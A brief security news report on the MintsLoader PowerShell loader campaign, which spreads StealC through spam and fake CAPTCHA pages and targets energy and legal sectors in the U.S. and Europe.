Threat hunters have identified an ongoing cyber campaign utilizing MintsLoader, a PowerShell-based malware loader, which disseminates additional malware like StealC and a legitimate tool, BOINC. The campaign, affecting sectors such as electricity, oil, gas, and legal services in the U.S. and Europe, begins with spam emails leading users to malicious links. These links often utilize fake CAPTCHA prompts to entice victims into running harmful scripts, thereby executing MintsLoader, which further retrieves malicious payloads from distant servers.
MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file.
The campaign has targeted electricity, oil and gas, and the legal services sectors in the United States and Europe, per the company, which detected the activity in early January 2025.
These fake verification pages load a potential victim's Windows copy/paste buffer with malicious PowerShell script. The page also gives detailed instructions asking potential victims to paste and execute the script in a Run window.
The attack chain documented by eSentire starts when users click on a link in a spam email, leading to the download of an obfuscated JavaScript file.
Collection
[
|
...
]